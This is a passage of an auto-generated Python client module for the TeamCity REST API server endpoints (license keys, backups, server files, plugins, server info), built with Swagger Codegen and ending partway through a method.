69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 23
|
2018-10-19T07:28:45.000Z
|
2021-11-12T12:46:09.000Z
|
dohq_teamcity/api/server_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 31
|
2018-10-16T05:53:11.000Z
|
2021-09-09T14:44:14.000Z
|
dohq_teamcity/api/server_api.py
|
DenKoren/teamcity
|
69acb4d1402c316129b4602882a9cce2d55cf926
|
[
"MIT"
] | 12
|
2018-10-28T23:00:17.000Z
|
2021-09-07T12:07:13.000Z
|
# coding: utf-8
"""
TeamCity REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2018.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
from dohq_teamcity.custom.base_model import TeamCityObject
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dohq_teamcity.models.backup_process_manager import BackupProcessManager # noqa: F401,E501
from dohq_teamcity.models.file import File # noqa: F401,E501
from dohq_teamcity.models.files import Files # noqa: F401,E501
from dohq_teamcity.models.license_key import LicenseKey # noqa: F401,E501
from dohq_teamcity.models.license_keys import LicenseKeys # noqa: F401,E501
from dohq_teamcity.models.licensing_data import LicensingData # noqa: F401,E501
from dohq_teamcity.models.plugins import Plugins # noqa: F401,E501
from dohq_teamcity.models.server import Server # noqa: F401,E501
class ServerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
base_name = 'Server'
def __init__(self, api_client=None):
self.api_client = api_client
def add_license_keys(self, **kwargs): # noqa: E501
"""add_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_license_keys(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str body:
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_license_keys_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__add_license_keys_with_http_info(**kwargs) # noqa: E501
return data
def delete_license_key(self, license_key, **kwargs): # noqa: E501
"""delete_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_license_key(license_key, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str license_key: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_license_key_with_http_info(license_key, **kwargs) # noqa: E501
else:
(data) = self.__delete_license_key_with_http_info(license_key, **kwargs) # noqa: E501
return data
def get_backup_status(self, **kwargs): # noqa: E501
"""get_backup_status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_backup_status(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_backup_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_backup_status_with_http_info(**kwargs) # noqa: E501
return data
def get_children(self, path, area_id, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_children_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_children_alias(self, path, area_id, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children_alias(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_children_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_content(self, path, area_id, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str response_builder:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_content_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_content_alias(self, path, area_id, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content_alias(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_content_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_license_key(self, license_key, **kwargs): # noqa: E501
"""get_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_license_key(license_key, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str license_key: (required)
:param str fields:
:return: LicenseKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_license_key_with_http_info(license_key, **kwargs) # noqa: E501
else:
(data) = self.__get_license_key_with_http_info(license_key, **kwargs) # noqa: E501
return data
def get_license_keys(self, **kwargs): # noqa: E501
"""get_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_license_keys(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_license_keys_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_license_keys_with_http_info(**kwargs) # noqa: E501
return data
def get_licensing_data(self, **kwargs): # noqa: E501
"""get_licensing_data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_licensing_data(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: LicensingData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_licensing_data_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_licensing_data_with_http_info(**kwargs) # noqa: E501
return data
def get_metadata(self, path, area_id, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_metadata(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str fields:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_metadata_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_metadata_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_root(self, area_id, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_root(area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_root_with_http_info(area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_root_with_http_info(area_id, **kwargs) # noqa: E501
return data
def get_zipped(self, path, area_id, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zipped(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str name:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_zipped_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_zipped_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def serve_plugins(self, **kwargs): # noqa: E501
"""serve_plugins # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_plugins(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: Plugins
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_plugins_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__serve_plugins_with_http_info(**kwargs) # noqa: E501
return data
def serve_server_info(self, **kwargs): # noqa: E501
"""serve_server_info # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_server_info(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: Server
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_server_info_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__serve_server_info_with_http_info(**kwargs) # noqa: E501
return data
def serve_server_version(self, field, **kwargs): # noqa: E501
"""serve_server_version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_server_version(field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_server_version_with_http_info(field, **kwargs) # noqa: E501
else:
(data) = self.__serve_server_version_with_http_info(field, **kwargs) # noqa: E501
return data
def start_backup(self, **kwargs): # noqa: E501
"""start_backup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_backup(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str file_name:
:param bool add_timestamp:
:param bool include_configs:
:param bool include_database:
:param bool include_build_logs:
:param bool include_personal_changes:
:param bool include_running_builds:
:param bool include_supplimentary_data:
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__start_backup_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__start_backup_with_http_info(**kwargs) # noqa: E501
return data
def __add_license_keys_with_http_info(self, **kwargs): # noqa: E501
"""add_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_license_keys_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str body:
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_license_keys" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_license_key_with_http_info(self, license_key, **kwargs): # noqa: E501
"""delete_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_license_key_with_http_info(license_key, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str license_key: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['license_key'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_license_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'license_key' is set
if ('license_key' not in params or
params['license_key'] is None):
raise ValueError("Missing the required parameter `license_key` when calling `delete_license_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'license_key' in params:
if isinstance(params['license_key'], TeamCityObject):
path_params['licenseKey'] = params['license_key'].locator_id
else:
path_params['licenseKey'] = params['license_key'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys/{licenseKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_backup_status_with_http_info(self, **kwargs): # noqa: E501
"""get_backup_status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_backup_status_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_backup_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/backup', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_children`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_children`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/children{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_alias_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_children_alias_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'base_path', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_children_alias`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_children_alias`") # noqa: E501
if 'path' in params and not re.search('(.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_children_alias`, must conform to the pattern `/(.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:param str response_builder:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'response_builder'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_content`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_content`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
if 'response_builder' in params:
query_params.append(('responseBuilder', params['response_builder'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/content{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_content_alias_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_content_alias_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_content_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_content_alias`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_content_alias`") # noqa: E501
if 'path' in params and not re.search('(\/.*)?', params['path']): # noqa: E501
raise ValueError("Invalid value for parameter `path` when calling `get_content_alias`, must conform to the pattern `/(\/.*)?/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'path' in params:
if isinstance(params['path'], TeamCityObject):
path_params['path'] = params['path'].locator_id
else:
path_params['path'] = params['path'] # noqa: E501
if 'area_id' in params:
if isinstance(params['area_id'], TeamCityObject):
path_params['areaId'] = params['area_id'].locator_id
else:
path_params['areaId'] = params['area_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/files/{areaId}/files{path}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_license_key_with_http_info(self, license_key, **kwargs): # noqa: E501
"""get_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_license_key_with_http_info(license_key, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str license_key: (required)
:param str fields:
:return: LicenseKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['license_key', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_license_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'license_key' is set
if ('license_key' not in params or
params['license_key'] is None):
raise ValueError("Missing the required parameter `license_key` when calling `get_license_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'license_key' in params:
if isinstance(params['license_key'], TeamCityObject):
path_params['licenseKey'] = params['license_key'].locator_id
else:
path_params['licenseKey'] = params['license_key'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys/{licenseKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKey', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_license_keys_with_http_info(self, **kwargs): # noqa: E501
"""get_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_license_keys_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_license_keys" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_licensing_data_with_http_info(self, **kwargs): # noqa: E501
"""get_licensing_data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_licensing_data_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields:
:return: LicensingData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_licensing_data" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicensingData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_metadata_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_metadata_with_http_info(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str path: (required)
:param str area_id: (required)
:param str fields:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['path', 'area_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_metadata" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'path' is set
if ('path' not in params or
params['path'] is None):
raise ValueError("Missing the required parameter `path` when calling `get_metadata`") # noqa: E501
# verify the required parameter 'area_id' is set
if ('area_id' not in params or
params['area_id'] is None):
raise ValueError("Missing the required parameter `area_id` when calling `get_metadata`") # noqa: E501
